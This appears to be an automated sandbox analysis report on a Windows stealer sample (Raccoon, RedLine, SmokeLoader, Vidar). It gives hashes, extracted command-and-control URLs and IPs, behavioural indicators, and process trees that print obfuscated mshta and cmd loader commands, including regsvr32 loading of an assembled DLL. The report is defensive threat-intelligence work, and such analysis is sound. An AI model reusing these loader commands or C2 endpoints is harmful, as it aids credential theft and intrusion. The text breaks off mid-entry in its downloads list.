raccoon | 5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b

Analysis

max time kernel
151s
max time network
150s
platform
windows10_x64
resource
win10-en-20211014
submitted
16-11-2021 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
Size

326KB
MD5

739b497fa91e90193c649338ca8fcbce
SHA1

faba0ec2f6e2190be027015f2eae23b55525250c
SHA256

5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b
SHA512

93d75e63e3ab18a640b3313babf52ad5b8db01c505d72e74a3e56cb4303564f11338df84f575db2a87d8d4d4ad9c2d88dbfaa2fcce2fb0e76f267fed703b9245

Score

10^/10

raccoon redline smokeloader vidar 706 ddf183af4241e3172885cf1b2c4c1fb4ee03d05a imbest backdoor collection discovery infostealer spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32

Extracted

Family

redline

185.159.80.90:38637

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

ddf183af4241e3172885cf1b2c4c1fb4ee03d05a

Attributes

url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar

rc4.plain

Extracted

Family

redline

Botnet

imbest

45.153.186.153:56675

Extracted

Family

vidar

Version

48.5

Botnet

706

https://koyu.space/@tttaj

Attributes

profile_id
706

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/396-144-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/396-145-0x0000000000418EEA-mapping.dmp	family_redline
behavioral1/memory/3832-178-0x0000000004380000-0x00000000043AD000-memory.dmp	family_redline
behavioral1/memory/3832-180-0x0000000004810000-0x000000000483C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3140 created 3060 3140 WerFault.exe FF13.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 3140 created 3060	3140	WerFault.exe	FF13.exe

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/3060-202-0x0000000004500000-0x00000000045D5000-memory.dmp	family_vidar
behavioral1/memory/3060-203-0x0000000000400000-0x00000000027E5000-memory.dmp	family_vidar

Downloads MZ/PE file
Executes dropped EXE 11 IoCs

Processes:

3A55.exe3A55.exe509E.exe5ED7.exe509E.exe77EE.exeAD57.exeDE0D.exeFF13.exe2941.exeGEpth.eXe

pid process

68 3A55.exe
3184 3A55.exe
3456 509E.exe
3484 5ED7.exe
396 509E.exe
4056 77EE.exe
2420 AD57.exe
3832 DE0D.exe
3060 FF13.exe
68 2941.exe
1768 GEpth.eXe
Deletes itself 1 IoCs

Processes:

pid process

2580
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exe

pid process

1628 regsvr32.exe
1628 regsvr32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
68	3A55.exe
3184	3A55.exe
3456	509E.exe
3484	5ED7.exe
396	509E.exe
4056	77EE.exe
2420	AD57.exe
3832	DE0D.exe
3060	FF13.exe
68	2941.exe
1768	GEpth.eXe

pid	process
2580

pid	process
1628	regsvr32.exe
1628	regsvr32.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 3 IoCs

Processes:

5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe3A55.exe509E.exe

description	pid	process	target process
PID 3816 set thread context of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 68 set thread context of 3184	68	3A55.exe	3A55.exe
PID 3456 set thread context of 396	3456	509E.exe	509E.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1684 2420 WerFault.exe AD57.exe
3140 3060 WerFault.exe FF13.exe

pid	pid_target	process	target process
1684	2420	WerFault.exe	AD57.exe
3140	3060	WerFault.exe	FF13.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

3A55.exe5ED7.exe5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3A55.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3A55.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5ED7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5ED7.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3A55.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5ED7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3620 taskkill.exe

pid	process
3620	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe

pid	process
856	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
856	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580
2580

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2580
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe3A55.exe5ED7.exe

pid process

856 5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
3184 3A55.exe
3484 5ED7.exe
2580
2580
2580
2580

pid	process
2580

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

509E.exeWerFault.exeDE0D.exeWerFault.exetaskkill.exe

description	pid	process
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeDebugPrivilege	396	509E.exe
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeRestorePrivilege	1684	WerFault.exe
Token: SeBackupPrivilege	1684	WerFault.exe
Token: SeDebugPrivilege	1684	WerFault.exe
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeDebugPrivilege	3832	DE0D.exe
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeDebugPrivilege	3140	WerFault.exe
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580
Token: SeCreatePagefilePrivilege	2580
Token: SeShutdownPrivilege	2580

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe3A55.exe509E.exe2941.exemshta.execmd.exeGEpth.eXe

description	pid	process	target process
PID 3816 wrote to memory of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 3816 wrote to memory of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 3816 wrote to memory of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 3816 wrote to memory of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 3816 wrote to memory of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 3816 wrote to memory of 856	3816	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe	5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
PID 2580 wrote to memory of 68	2580		3A55.exe
PID 2580 wrote to memory of 68	2580		3A55.exe
PID 2580 wrote to memory of 68	2580		3A55.exe
PID 68 wrote to memory of 3184	68	3A55.exe	3A55.exe
PID 68 wrote to memory of 3184	68	3A55.exe	3A55.exe
PID 68 wrote to memory of 3184	68	3A55.exe	3A55.exe
PID 68 wrote to memory of 3184	68	3A55.exe	3A55.exe
PID 68 wrote to memory of 3184	68	3A55.exe	3A55.exe
PID 68 wrote to memory of 3184	68	3A55.exe	3A55.exe
PID 2580 wrote to memory of 3456	2580		509E.exe
PID 2580 wrote to memory of 3456	2580		509E.exe
PID 2580 wrote to memory of 3456	2580		509E.exe
PID 2580 wrote to memory of 3484	2580		5ED7.exe
PID 2580 wrote to memory of 3484	2580		5ED7.exe
PID 2580 wrote to memory of 3484	2580		5ED7.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 3456 wrote to memory of 396	3456	509E.exe	509E.exe
PID 2580 wrote to memory of 4056	2580		77EE.exe
PID 2580 wrote to memory of 4056	2580		77EE.exe
PID 2580 wrote to memory of 4056	2580		77EE.exe
PID 2580 wrote to memory of 2420	2580		AD57.exe
PID 2580 wrote to memory of 2420	2580		AD57.exe
PID 2580 wrote to memory of 2420	2580		AD57.exe
PID 2580 wrote to memory of 3832	2580		DE0D.exe
PID 2580 wrote to memory of 3832	2580		DE0D.exe
PID 2580 wrote to memory of 3832	2580		DE0D.exe
PID 2580 wrote to memory of 3060	2580		FF13.exe
PID 2580 wrote to memory of 3060	2580		FF13.exe
PID 2580 wrote to memory of 3060	2580		FF13.exe
PID 2580 wrote to memory of 68	2580		2941.exe
PID 2580 wrote to memory of 68	2580		2941.exe
PID 2580 wrote to memory of 68	2580		2941.exe
PID 2580 wrote to memory of 1964	2580		explorer.exe
PID 2580 wrote to memory of 1964	2580		explorer.exe
PID 2580 wrote to memory of 1964	2580		explorer.exe
PID 2580 wrote to memory of 1964	2580		explorer.exe
PID 2580 wrote to memory of 1232	2580		explorer.exe
PID 2580 wrote to memory of 1232	2580		explorer.exe
PID 2580 wrote to memory of 1232	2580		explorer.exe
PID 68 wrote to memory of 676	68	2941.exe	mshta.exe
PID 68 wrote to memory of 676	68	2941.exe	mshta.exe
PID 68 wrote to memory of 676	68	2941.exe	mshta.exe
PID 676 wrote to memory of 3508	676	mshta.exe	cmd.exe
PID 676 wrote to memory of 3508	676	mshta.exe	cmd.exe
PID 676 wrote to memory of 3508	676	mshta.exe	cmd.exe
PID 3508 wrote to memory of 1768	3508	cmd.exe	GEpth.eXe
PID 3508 wrote to memory of 1768	3508	cmd.exe	GEpth.eXe
PID 3508 wrote to memory of 1768	3508	cmd.exe	GEpth.eXe
PID 3508 wrote to memory of 3620	3508	cmd.exe	taskkill.exe
PID 3508 wrote to memory of 3620	3508	cmd.exe	taskkill.exe
PID 3508 wrote to memory of 3620	3508	cmd.exe	taskkill.exe
PID 1768 wrote to memory of 3200	1768	GEpth.eXe	mshta.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
"C:\Users\Admin\AppData\Local\Temp\5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Admin\AppData\Local\Temp\5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe
"C:\Users\Admin\AppData\Local\Temp\5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:856

C:\Users\Admin\AppData\Local\Temp\3A55.exe
C:\Users\Admin\AppData\Local\Temp\3A55.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:68

C:\Users\Admin\AppData\Local\Temp\3A55.exe
C:\Users\Admin\AppData\Local\Temp\3A55.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3184

C:\Users\Admin\AppData\Local\Temp\509E.exe
C:\Users\Admin\AppData\Local\Temp\509E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3456

C:\Users\Admin\AppData\Local\Temp\509E.exe
C:\Users\Admin\AppData\Local\Temp\509E.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Users\Admin\AppData\Local\Temp\5ED7.exe
C:\Users\Admin\AppData\Local\Temp\5ED7.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3484

C:\Users\Admin\AppData\Local\Temp\77EE.exe
C:\Users\Admin\AppData\Local\Temp\77EE.exe
1⤵
- Executes dropped EXE
PID:4056

C:\Users\Admin\AppData\Local\Temp\AD57.exe
C:\Users\Admin\AppData\Local\Temp\AD57.exe
1⤵
- Executes dropped EXE
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 404
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Users\Admin\AppData\Local\Temp\DE0D.exe
C:\Users\Admin\AppData\Local\Temp\DE0D.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3832

C:\Users\Admin\AppData\Local\Temp\FF13.exe
C:\Users\Admin\AppData\Local\Temp\FF13.exe
1⤵
- Executes dropped EXE
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 952
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Users\Admin\AppData\Local\Temp\2941.exe
C:\Users\Admin\AppData\Local\Temp\2941.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:68

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScriPt: clOse( CrEateObjECT( "Wscript.SHELL"). RUn ("CmD.EXe /Q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\2941.exe"" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF """" == """" for %z in (""C:\Users\Admin\AppData\Local\Temp\2941.exe"") do taskkill /IM ""%~nXz"" -F " , 0, true) )
2⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /R TYpE "C:\Users\Admin\AppData\Local\Temp\2941.exe" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF "" =="" for %z in ("C:\Users\Admin\AppData\Local\Temp\2941.exe") do taskkill /IM "%~nXz" -F
3⤵
- Suspicious use of WriteProcessMemory
PID:3508

C:\Users\Admin\AppData\Local\Temp\GEpth.eXe
..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScriPt: clOse( CrEateObjECT( "Wscript.SHELL"). RUn ("CmD.EXe /Q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\GEpth.eXe"" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF ""/PWvkDiYa1vO4kkeo6dmUXtDkxgvu "" == """" for %z in (""C:\Users\Admin\AppData\Local\Temp\GEpth.eXe"") do taskkill /IM ""%~nXz"" -F " , 0, true) )
5⤵
PID:3200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /R TYpE "C:\Users\Admin\AppData\Local\Temp\GEpth.eXe" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF "/PWvkDiYa1vO4kkeo6dmUXtDkxgvu " =="" for %z in ("C:\Users\Admin\AppData\Local\Temp\GEpth.eXe") do taskkill /IM "%~nXz" -F
6⤵
PID:2828

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscRipt: clOse ( CrEAteoBJEcT ( "wSCRipT.shEll" ). rUn ( "cMD /r Echo | sET /P = ""MZ"" > b_YXEl0G._J & CoPY /Y /B b_YXEL0G._J+ VJM7A_.O + RTKwu.VjJ ..\F3Os.H & del /q *& staRt regsvr32 -u /s ..\f3OS.H " ,0 , trUE ) )
5⤵
PID:588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r Echo | sET /P = "MZ" > b_YXEl0G._J & CoPY /Y /B b_YXEL0G._J+ VJM7A_.O + RTKwu.VjJ ..\F3Os.H & del /q *& staRt regsvr32 -u /s ..\f3OS.H
6⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
7⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>b_YXEl0G._J"
7⤵
PID:2120

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -u /s ..\f3OS.H
7⤵
- Loads dropped DLL
PID:1628

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "2941.exe" -F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3620

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1964

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\509E.exe.log
MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Users\Admin\AppData\Local\Temp\2941.exe
MD5
d8a81f4f7e64f2e5f3c4bef85c23931b

SHA1
6df6b63f7c717945d57ac8e9189efb1c42aa6a24

SHA256
361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd

SHA512
98d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2941.exe
MD5
d8a81f4f7e64f2e5f3c4bef85c23931b

SHA1
6df6b63f7c717945d57ac8e9189efb1c42aa6a24

SHA256
361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd

SHA512
98d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A55.exe
MD5
739b497fa91e90193c649338ca8fcbce

SHA1
faba0ec2f6e2190be027015f2eae23b55525250c

SHA256
5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b

SHA512
93d75e63e3ab18a640b3313babf52ad5b8db01c505d72e74a3e56cb4303564f11338df84f575db2a87d8d4d4ad9c2d88dbfaa2fcce2fb0e76f267fed703b9245

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A55.exe
MD5
739b497fa91e90193c649338ca8fcbce

SHA1
faba0ec2f6e2190be027015f2eae23b55525250c

SHA256
5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b

SHA512
93d75e63e3ab18a640b3313babf52ad5b8db01c505d72e74a3e56cb4303564f11338df84f575db2a87d8d4d4ad9c2d88dbfaa2fcce2fb0e76f267fed703b9245

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A55.exe
MD5
739b497fa91e90193c649338ca8fcbce

SHA1
faba0ec2f6e2190be027015f2eae23b55525250c

SHA256
5241bfe2b10e10c08c3ed731298b27dfd708be81460ad281dab3e6987e41712b

SHA512
93d75e63e3ab18a640b3313babf52ad5b8db01c505d72e74a3e56cb4303564f11338df84f575db2a87d8d4d4ad9c2d88dbfaa2fcce2fb0e76f267fed703b9245

Download Submit
C:\Users\Admin\AppData\Local\Temp\509E.exe
MD5
5e34695c9f46f1e69ce731d3b7359c88

SHA1
e1e5bb43f0c7556bcccc8cb698f854694bdc024a

SHA256
97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

SHA512
659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\509E.exe
MD5
5e34695c9f46f1e69ce731d3b7359c88

SHA1
e1e5bb43f0c7556bcccc8cb698f854694bdc024a

SHA256
97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

SHA512
659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\509E.exe
MD5
5e34695c9f46f1e69ce731d3b7359c88

SHA1
e1e5bb43f0c7556bcccc8cb698f854694bdc024a

SHA256
97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

SHA512
659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ED7.exe
MD5
d985b4cfdceecc3c0fe4f3e4fda4e416

SHA1
f3c14a4d87569e54faaf0eac73ec1aafa2621dfa

SHA256
a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7

SHA512
560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ED7.exe
MD5
d985b4cfdceecc3c0fe4f3e4fda4e416

SHA1
f3c14a4d87569e54faaf0eac73ec1aafa2621dfa

SHA256
a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7

SHA512
560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c

Download Submit
C:\Users\Admin\AppData\Local\Temp\77EE.exe
MD5
8f79110737dc06d512478b5f7d8d5c2b

SHA1
6c1cb2cb48d77ec4bb4e500f0fa7ab873d35e063

SHA256
bf5031c61e39f9dfb379eba03181bfc5bdc63527c25588279fc9e2684e462c11

SHA512
efc3b733905b6266d17c33ef8e091307ea6afcef2d1f292431ffc6701eb07d49197512d24d583f82781f9eccad4084c808ce547e82deaec28f1adac8251836e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\77EE.exe
MD5
8f79110737dc06d512478b5f7d8d5c2b

SHA1
